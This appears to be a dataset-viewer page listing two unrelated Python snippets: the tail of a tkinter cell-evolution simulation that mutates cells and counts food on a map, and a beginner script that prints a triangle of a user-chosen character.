        # Mutate only the first 5 cells of the new generation.
        for idx, cell in enumerate(cells):
            if idx == 5:
                break
            elif idx < 5:
                cell['cell'].mutation()
        end = time.perf_counter()
        print(end - start)
        # Count how much food is currently on the map.
        for key in position_on_map:
            if position_on_map[key] == 'food':
                counter += 1
        print('counter-->', counter)
        counter = 0
        start = time.perf_counter()
    elif len(cells) < 5:
        raise Accident('len smaller then 5')
    canvas.update()
    # time.sleep(0.01)
root.mainloop()
"""
hash map of elements on the map
{
id: 'type'
id - id of the map
type - cell type on this cell
}
"""
|
# Print a 6-row right triangle built from a user-supplied character.
# BUG FIX: the original wrapped input() in int(), which raises ValueError for
# any non-numeric "special character" such as '*'; read it as a string.
# (For digits the printed output is identical.)
j = input("enter a special character :")
for i in range(0, 6):
    # row i contains i + 1 copies of the character, separated by spaces
    for k in range(i + 1):
        print(j, end=' ')
    print()
# r=int(input("enter a row: "))
# a=input("enter a special character: ")
# no_of_spaces=2*r-2
# for i in range(0,r):
# for M in range(0,no_of_spaces):
# print(end=" ")
# no_of_spaces=no_of_spaces-2
# for k in range(i+1):
# print(a, end=' ')
# print("\n")
# r=int(input("enter a row: "))
# a=input("enter a special character: ")
# no_of_spaces=2*r-2
# for i in range(0,r):
# for M in range(0,no_of_spaces):
# print(end=" ")
# no_of_spaces=no_of_spaces-2
# for k in range(i+1):
# print(a, end=' ')
# print("\n")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.